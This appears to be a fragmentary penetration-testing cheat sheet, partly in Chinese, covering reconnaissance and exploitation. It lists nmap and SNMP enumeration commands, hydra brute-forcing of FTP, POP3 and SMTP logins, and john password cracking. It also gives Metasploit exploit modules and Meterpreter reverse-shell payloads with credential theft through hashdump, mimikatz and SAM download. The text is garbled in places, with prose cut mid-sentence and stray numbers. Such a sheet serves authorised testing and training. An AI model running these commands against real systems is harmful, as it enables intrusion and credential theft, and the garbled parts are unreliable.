nslookup -> set type=any -> ls -d blah.com
dig axfr blah.com @ns1.blah.com
nc -v 192.168.1.1 25
telnet 192.168.1.1 25
nmap -v -sS -A -T4 target
nmap -v -sS -p--A -T4 target
nmap -v -sU -sS -p- -A -T4 target
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X
T4
扫描,使用TCP
连接扫描时用T2
比较合适。T4
扫描用在低延迟高带宽的内部网络测试会更合适。但这也取决于目标设备,如果用T4/T5
扫他们,结果就可能不准确。总的来说,扫描越慢越好,也可以先快速扫描1000个目标方便上手测试,然后再慢慢扫其余的。netdiscover -r 192.168.1.0/24
snmpcheck -t 192.168.1.X -c public
` snmpwalk -c public -v1 192.168.1.X 1<br />
snmpenum -t 192.168.1.X <br />
onesixtyone -c names -i hosts `nmap -A
会进行下面列举的所有远程服务的枚举,所以这里只是顺便提及。https://127.0.0.1:9392
登陆openvas,密码是在安装时设置好的。netcat -nvlp 443
。/etc/proxychains.conf
添加sock4 127.0.0.1 1010
/etc/proxychains.conf
添加sock4 127.0.0.1 1010
/etc/proxychains.conf
添加sock4 127.0.0.1 1011
128
64
255
255
0.0.0.0 - 127.255.255.255
128.0.0.0 - 191.255.255.255
192.0.0.0 - 223.255.255.255
224.0.0.0 - 239.255.255.255
240.0.0.0 - 255.255.255.255
10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255
127.0.0.0 - 127.255.255.255
255.255.255.254
1 Host
255.255.255.252
2 Hosts
255.255.255.249
6 Hosts
255.255.255.240
14 Hosts
255.255.255.224
30 Hosts
255.255.255.192
62 Hosts
255.255.255.128
126 Hosts
255.255.255.0
254 Hosts
255.255.254.0
512 Host
255.255.252.0
1022 Hosts
255.255.248.0
2046 Hosts
255.255.240.0
4094 Hosts
255.255.224.0
8190 Hosts
255.255.192.0
16382 Hosts
255.255.128.0
32766 Hosts
255.255.0.0
65534 Hosts
255.254.0.0
131070 Hosts
255.252.0.0
262142 Hosts
255.248.0.0
524286 Hosts
site:exploit-db.com exploit kernel <= 3
grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/*
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:80
mount 192.168.1.1:/vol/share /mnt/nfs
/mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs
/mnt/cifs
。如果不直接在命令里带密码,可以在询问后输入,这样就不会在bash命令历史里存储明文密码net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no
apt-get install smb4k -y
nikto -h 192.168.1.1
dirbuster
tcpdump tcp port 80 -w output.pcap -i eth0
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep)
/usr/share/wordlists
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V
-t
限制并发连接数,如 -t 15
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt
john --format=descrypt hash --show
#include
的文件来判定process.h, string.h, winbase.h, windows.h, winsock2.h
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
gcc -o exploit exploit.c
gcc -m32 exploit.c -o exploit
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
su
from reverse shells.su
的特殊命令。set payload windows/meterpreter/reverse_tcp
set payload windows/vncinject/reverse_tcp``set ViewOnly false
set payload linux/meterpreter/reverse_tcp
upload file c:\\windows
download c:\\windows\\repair\\sam /tmp
execute -f c:\\windows\temp\exploit.exe
execute -f cmd -c
ps
shell
getsystem
hashdump
portfwd add –l 3389 –p 3389 –r target
portfwd delete –l 3389 –p 3389 –r target
use exploit/windows/smb/ms08_067_netapi
use exploit/windows/dcerpc/ms06_040_netapi
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
use exploit/windows/local/bypassuac
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/jboss_vulnscan
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/oracle/oracle_login
use exploit/multi/script/web_delivery
post/windows/manage/powershell/exec_powershell
use exploit/multi/http/jboss_maindeployer
use exploit/windows/mssql/mssql_payload
run post/windows/gather/win_privs
use post/windows/gather/credentials/gpp
load mimikatz -> wdigest
run post/windows/gather/local_admin_search_enum
run post/windows/gather/smart_hashdump
x00
x08
x09
x0a
x0d
x1b
x20
x21
x22
x23
x24
x25
x26
x27
x28
x29
x2a
x2b
x2c
enable
conf t
(config)# interface fa0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255
(config-if)# line vty 0 4
(config-line)# login
(config-line)# password YOUR-PASSWORD
# show running-config
# show startup-config
# show version
# show session
# show ip interface
# show interface e0
# show ip route
# show access-lists
# dir file systems
# dir all-filesystems
# dir /all
# terminal length 0
16 Bytes
20 Bytes
32 Bytes
64 Bytes
8743b52063cd84097a65d1633f5c74f5
01dfae6e5d4d90d9892622325959afbe:7050461
f0fda58630310a6dd91a7d8f0a4ceda2:4225637426
b89eaac7e61417341b710b727768294d0e6a277b
2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935
c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4
eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617
82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f
e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd
976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a
b4b9b02e6f09a9bd760f388b67351e2b